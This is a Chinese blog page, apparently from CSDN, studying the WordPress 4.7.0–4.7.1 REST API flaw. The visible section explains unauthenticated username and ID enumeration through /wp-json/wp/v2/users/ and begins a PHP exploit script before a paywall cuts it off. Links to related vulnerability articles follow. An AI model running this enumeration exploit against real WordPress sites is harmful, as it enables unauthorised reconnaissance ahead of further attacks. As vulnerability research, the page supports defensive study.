wordpress4.7.0-4.7.1内容注入漏洞研究

最新推荐文章于 2024-06-18 16:40:54 发布
最新推荐文章于 2024-06-18 16:40:54 发布
阅读量3.2k 收藏 1
点赞数 1
分类专栏: wp4-7-1漏洞整
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zsd747289639/article/details/75213706
版权

wordpress4.7.0-4.7.1内容注入漏洞研究

一、获取user
1.影响:未授权获取发布过文章的其他用户的用户名、id
2.触发前提: wordpress配置REST API
3.影响版本:<= 4.7
4.漏洞说明: Get请求什么都不用做就可以避开wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php 的逻辑判断,返回ture,程序继续执行query,REST API接口查询后以json格式在前端显示。能够获取到用户的一些信息。 请求地址:http://127.0.0.1/wordpress-4.7.1/wp-json/wp/v2/users/
5.exploit:

<?php
#Author: Mateus a.k.a Dctor
#fb: fb.com/hatbashbr/
#E-mail: dctoralves@protonmail.ch
#Site: https://mateuslino.tk 
header ('Content-type: text/html; charset=UTF-8');
$url= "http://xxxx.cn/";
$payload="wp-json/wp/v2/users/";
$urli = file_get_contents($url.$payload);
$json = json_decode($urli, true);
if($json){
    echo "*-----------------------------*\n"
最低0.47元/天 解锁文章
zsd747289639
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WordPress REST API 内容注入/权限提升漏洞
huckers的博客
02-04 2019
WordPress 是一个以 PHP 和 MySQL 为平台的自由开源的博客软件和内容管理系统,至少有 1800 万个网站使用该系统。在 4.7.0 版本后,REST API 插件的功能被集成到 WordPress 中,由此也引发了一些安全性问题。WordPress REST API 内容注入/权限提升漏洞于 1 月 22 日被安全公司 Sucuri 研究员 Marc-Alexandre Mont...
Wordpress4.7.4-CSRF漏洞复现
PANDA墨森的博客
08-22 1097
#001 漏洞简介: CSRF漏洞出现的位置是,管理员后台的添加用户和删除用户处均存在CSRF漏洞。 #002 漏洞复现: Part1-添加用户的CSRF: 首先找到添加用户的页面,添加用户,如下图填入相关信息,点击添加 可以看到成功添加,接下来我们试着抓包分析一下 我们试着去抓包看一下有没有加token验证,尝试改一下参数,看能否添加其他用户,构造请求,让管理员点击,就会成功添加新的用户。 接下来具体分析和操作: 首先开启burp的代理拦截,抓包,可以看到是通过PO...
WordPress Plugin SQL注入漏洞(CVE-2024-25832)
最新发布
2301_80127209的博客
06-18 397
WordPress是一种流行的内容管理系统(CMS),它提供了基本的网站功能,如文章发布、页面管理和用户权限控制等。然而,有时候用户需要更多的功能或特定的定制需求,这时就可以使用WordPress Plugin来实现。申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。帮助你在面试中脱颖而出。
wp linux 权限,WordPress又曝漏洞:REST API由于权限控制失效致内容注入
weixin_36332616的博客
04-30 193
WordPress最近曝出内容注入漏洞,影响到REST API——来自Sucuri的安全研究人员最先发现该漏洞。未经授权的攻击者利用该漏洞注入恶意内容,以及进行提权,对文章、页面等内容进行修改。REST API是最近添加到WordPress 4.7.0并默认启用的。鉴于WordPress使用的广泛性,该漏洞的影响还是比较大的。使用 WordPress REST API 是简便高效的通过 JSON...
WordPress 4.7.1 零日漏洞现身,分分钟改掉你的网站内容
weixin_34248849的博客
08-09 129
WordPress 最初一款个人博客系统,由于简单易用便逐渐发展成了内容管理系统,深受广大人民喜爱。 几天前,不少网站管理员发现自己的 WordPress 自动升级到了最新的 4.7.2 版本,正当许多人疑惑不解时,2月2日,安全公司 Sucuri 曝出 4.74.7.1 版本 WordPress 的 REST API (一种接口规范)存在零日...
意想不到!WordPress安全漏洞98%来自插件
weixin_33775572的博客
05-20 158
资安业者Imperva在2018年所进行的调查显示,尽管WordPress是黑客最常锁定的内容管理平台(Content Management System),但全球的WordPress网站漏洞,却有高达98%与插件有关,只有2%涉及WordPress核心。在全球的网站中,有28%是以WordPress架设,若计算全球基于CMS的网站,WordPress的市占率更高达59%。 市占率最高的平台自然...
WordPress 4.7.0及4.7.1存在越权漏洞 官方已出补丁 站长们尽快备份后升级吧
weixin_34097242的博客
09-01 387
WordPress 4.7.0-4.7.1版本中,存在着一个越权漏洞,成功的利用这个漏洞,可以绕过管理员权限对文章进行增删改查操作。官方已经发布补丁,请广大站长朋友们尽快备份后升级。 WordPress 4.7.1越权漏洞 WordPress是一种使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把...
shiro-attack-4.7.0-SNAPSHOT-all.zip
10-24
标题提到的"shiro-attack-4.7.0-SNAPSHOT-all.zip"很可能是针对Apache Shiro的安全测试工具或者漏洞利用工具包,其主要目的是帮助开发者检测和防范Shiro框架相关的安全问题。 描述中的"序列化验证工具"可能是指该...
eclipse-4.7.0-linux.gtk.x86-64.tar.gz
03-31
标题 "eclipse-4.7.0-linux.gtk.x86-64.tar.gz" 提供的信息揭示了这是一款针对Linux操作系统的Eclipse IDE的特定版本。Eclipse是一款开源的集成开发环境(Integrated Development Environment,IDE),广泛用于Java...
rocketmq-all-4.7.0-source-release.zip
04-09
在"rocketmq-all-4.7.0-source-release.zip"这个压缩包中,包含了RocketMQ 4.7.0版本的完整源代码。这个版本的发布标志着RocketMQ在功能、性能和稳定性上又迈出了坚实的一步。开发者可以深入研究源代码,理解其内部...
phoenix-core-4.7.0-HBase-1.1-API文档-中文版.zip
05-02
赠送jar包:phoenix-core-4.7.0-HBase-1.1.jar; 赠送原API文档:phoenix-core-4.7.0-HBase-1.1-javadoc.jar; 赠送源代码:phoenix-core-4.7.0-HBase-1.1-sources.jar; 赠送Maven依赖信息文件:phoenix-core-4.7.0...
yum-4.7.0-4.el8.noarch.rpm
12-24
官方离线安装包,测试可用。使用rpm -ivh [rpm完整包名] 进行安装
WordPress漏洞————4.7.0——4.7.1内容注入漏洞分析
Fly_鹏程万里
03-30 3640
一、获取user 1.影响:未授权获取发布过文章的其他用户的用户名、id 2.触发前提: wordpress配置REST API 3.影响版本:&lt;= 4.7 4.漏洞说明: Get请求什么都不用做就可以避开wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php 的逻辑判断,返回ture,程序继续执行query,RES...
WordPress 5.7 XXE Vulnerability---翻译自seebug
Armandhe的博客
05-30 634
要不要搭个环境复现以下呢?????这是个问题
linux嵌入式远程代码执行漏洞,【漏洞预警】WordPress <4.7.1 远程代码执行漏洞(更新漏洞环境)...
weixin_39978282的博客
05-06 722
漏洞预警】WordPress <4.7.1 远程代码执行漏洞(更新漏洞环境)2017-05-06 14:42:18阅读:0次传送门关于WordPressWordPress是一个注重美学、易用性和网络标准的个人信息发布平台。WordPress虽为免费的开源软件,但其价值无法用金钱来衡量。使用WordPress可以搭建功能强大的网络信息发布平台,但更多的是应用于个性化的博客。针对博客的应用,W...
mysql 帐户枚举漏洞_Wordpress < 4.7.1用户名枚举漏洞分析(CVE-2017-5487) | 绿盟科技技术博客...
weixin_35823441的博客
01-21 1785
阅读:4,380WordPress是一种使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把 WordPress当作一个内容管理系统来使用。WordPress4.7.0版本之后将REST API插件集成到默认功能之中。REST API为WordPress的使用者提供了一个方便快捷的管理接口。在WordPress 4.7.0版本中,存在着一个...
Wordpress漏洞
热门推荐
Grey的博客
07-19 2万+
爆路径方法: 1.http://www.chouwazi.com/wp-admin/includes/admin.php   2.http://www.chouwazi.com/wp-content/plugins/akismet/akismet.php   3.http://www.chouwazi.com/wp-content/plugins/akismet/hello.php   4...
您需要了解的WordPress漏洞以及如何修复它们
cumi7754的博客
08-04 1010
by Joel S. Syder 乔尔·赛德(Joel S.Syder) 您需要了解的WordPress漏洞以及如何修复它们 (WordPress vulnerabilities you need to know about — and how to fix them) WordPress is an incredibly useful and versatile platform for a...
wordpress 漏洞_WordPress漏洞分析
weixin_42514783的博客
01-26 5371
根据CVE官方漏洞通报得知wordpress新出一个组合式rce漏洞漏洞编号分别为CVE-2019-8943和CVE-2019-8942,下载漏洞版本源码,分析漏洞触发过程,注:漏洞复现时一定要断网搭建,wordpress在联网状态时会自动更新代码包。找到漏洞发生文件 post.php,wordpress有多个post.php文件,这里简要说明一下各自的作用,wp-includes/post.p...
posman-4.7.0-crx4chrome
08-19
posman-4.7.0-crx4chrome是一个谷歌浏览器的扩展程序,具有强大的功能。 首先,posman-4.7.0-crx4chrome可用于模拟和测试HTTP请求。它提供了一个用户友好的界面,让用户能够轻松地创建自定义的HTTP请求,并查看请求...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值